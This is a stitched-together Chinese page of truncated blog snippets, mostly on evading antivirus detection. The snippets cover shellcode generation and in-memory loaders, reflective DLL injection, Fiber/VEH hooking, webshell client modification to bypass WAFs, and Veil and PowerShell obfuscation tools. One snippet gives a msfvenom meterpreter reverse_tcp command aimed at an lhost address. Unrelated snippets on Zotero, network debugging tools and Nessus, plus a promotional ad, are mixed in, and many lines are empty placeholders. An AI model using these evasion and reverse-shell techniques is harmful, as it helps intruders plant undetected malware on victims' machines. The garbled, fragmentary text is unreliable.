软件免杀工具

0x01 生成shellcode 首先通过下列命令生成一个shellcode，使用msfvenom -p选项来指定paylaod，这里选用windows/x64、exec模块接收的参数。使用calc.exe执行弹出计算器的操作。-f选项用来执行生成的shellcdoe的编译语言。 0x02 加载与执行shellcode的程序 程序为： 0x03 程序解释 导入模块，并且程

C/C++ -- ShellCode - 免杀对抗 介绍：          shellcode是一段用于利用软件漏洞而执行的代码，shellcode为16进制的机器码，因为经常让攻击者获得shell而得名。我们经常在CS里面生成指定编程语言的payload，而这个payload里面就是一段十六进制的机器码。 为什么要使用 shellcode ：

DLL（动态链接库）注入技术是木马程序，远控程序免杀过程中很常见的一种技术。但是这种技术随着时间的流逝，免杀效果越来越差。因此，需要在原版的基础上我们需要去升级成反射注入，也是目前主流的免杀方式之一，反射注入的介绍我们在下面详解。 在我们继续下面的

c++编译环境 一串简单的将shellcode加载入windows内存执行的c++代码 payload变量里存储的就是我们的shellcode 代码： 作用： 代码： 作用： 代码： 解释： 代码： 作用： 代码： 作用： 代码： 作用： 代码： 作用： 这就是一个简单的将shellcode加载进windows内存里执行的程序代码 如果

为什么会有改造蚁剑的想法，之前看到有做冰蝎的流量加密，来看到绕过waf，改造一些弱特征，通过流量转换，跳过密钥交互。 但是，冰蝎需要反编译去改造源码，再进行修复bug，也比较复杂。而AntSword相对于冰蝎来说，不限制webshell，即一句话也可以进行连接，还可以自定

协议模块使用，Request爬虫技术，简易多线程技术，编码技术，Bypass后门技术 掌握利用强大的模块实现各种协议连接操作(爆破或利用等)，配合Fuzz吊打WAF等 Python开发-简单多线程技术实现脚本 queue，threading模块使用 Python开发-利用FTP模块实现协议爆破脚本 1.ftplib模块使用 2.遍历

1 Veil的使用 （1）Veil主要用于生成：免杀payload （2）下载地址：https://github.com/Veil-Framework/Veil （3）安装过程：https://blog.csdn.net/qq_53079406/article/details/126192511 2 生成有效载荷payload 选择payload Generator 选择Veil 不要选择 x64可能出错。不要打勾就可以了。 3 Veil免杀过程 运行veil 在终

效果 可以看到成功上线 这个先不做免杀，之后补充

Invoke-Obfuscation工具下载地址: https://github.com/danielbohannon/Invoke-Obfuscation Invoke-Obfuscation是一款PowerShell混淆工具，可以将PowerShell脚本加密，使得它的检测和分析变得更加困难。该工具包含多种加密方法，可以单独使用也可以结合使用，以提高混淆的效果。Invoke-Obfuscation还有多个选

用来辅助软件开发、运行、维护、管理和支持等过程中的活动的软件称为软件工具。 对应于软件开发过程的各种活动，软件开发工具通常有：需求分析工具、设计工具、编码与 排错工具、测试工具等。 辅助软件维护过程中活动的软件称为软件维护工具，它辅助维护人员对软

加载方式Fiber+VEH Hook Load Fiber是纤程免杀，VEH是异常报错，hook使用detours来hook VirtualAlloc和sleep，通过异常报错调用实现主动hook 纤程Fiber的概念：纤程是比线程的更小的一个运行单位。可以把一个线程拆分成多个纤程，然后通过人工转换纤程，从而让各个纤程工作。线程的实现

cs 上线 1. 生成 shellcode-c 或者 python 2. 打开 pycharm 工具，创建一个 py 文件，将原生态执行代码复制进去 shellcode 执行代码： 3.将生成的shellcode放到执行代码中，运行代码，cs成功上线 MSF 上线 1.执行命令，生成shellcode 命令：msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.206.129

目录 一、IDA 1.1、简介： 1.2、使用方法： （1）IDA打开文件 （2）IDA主窗口介绍 （3）IDA的基本使用 二、调试器 2.1、简介： 2.2、Ollydbg （1）主界面 （2）断点操作 （3）代码跟踪操作 2.3、gdb （1）简介： （2）安装 （3）基本的调试操作 三、Trace类工具 3.1、简介： 3.2、Qira 反汇

sokit真的非常好用，可做服务端，可做客户端 sokit是一款非常简单易用的tcp、udp调试工具，主要适用于专业的网络管理使用，它可以轻松查看网内的数据情况，能够有效地接收、发送、转发TCP或UDP数据包。   先创建服务端，再创建客户端 服务端 打开sokit，操作如下所示： 共

知识点 总结

突然发现Zotero也有手机端APP，IOS和安卓的都有，反手立马下载。安卓端没测试，大家自己动手尝试一下吧。 ipad也是有的哦，太方便啦吧！！！ 登录账号后，马上同步到手机，虽然只有条目信息，但是pdf还是没有同步到手机。 坚果云WebDAV真的是YYDS，和PC端设置方式一样，具体

各种功能强大的代理工具在接口测试中发挥着作用，如Charles、Burpsuite、Mitmproxy等。这些代理工具可以帮助我们构造各种测试场景，以便我们更好地完成测试工作。下面的介绍以Charles为主。 Charles是一款代理服务器工具，用它可以截取请求和响应以达到抓包的目的，它支持多平

给大家准备了全套网络安全梓料，有web安全，还有渗透测试等等内容，还包含电子书、面试题、pdf文档、视频以及相关的网络安全笔记 👇👇👇 《黑客网络安全入门进阶学习包》 👆👆👆 Nessus 是最好的免费网络漏洞扫描器，它可以运行于几乎所有的UNIX平台之上。它不止永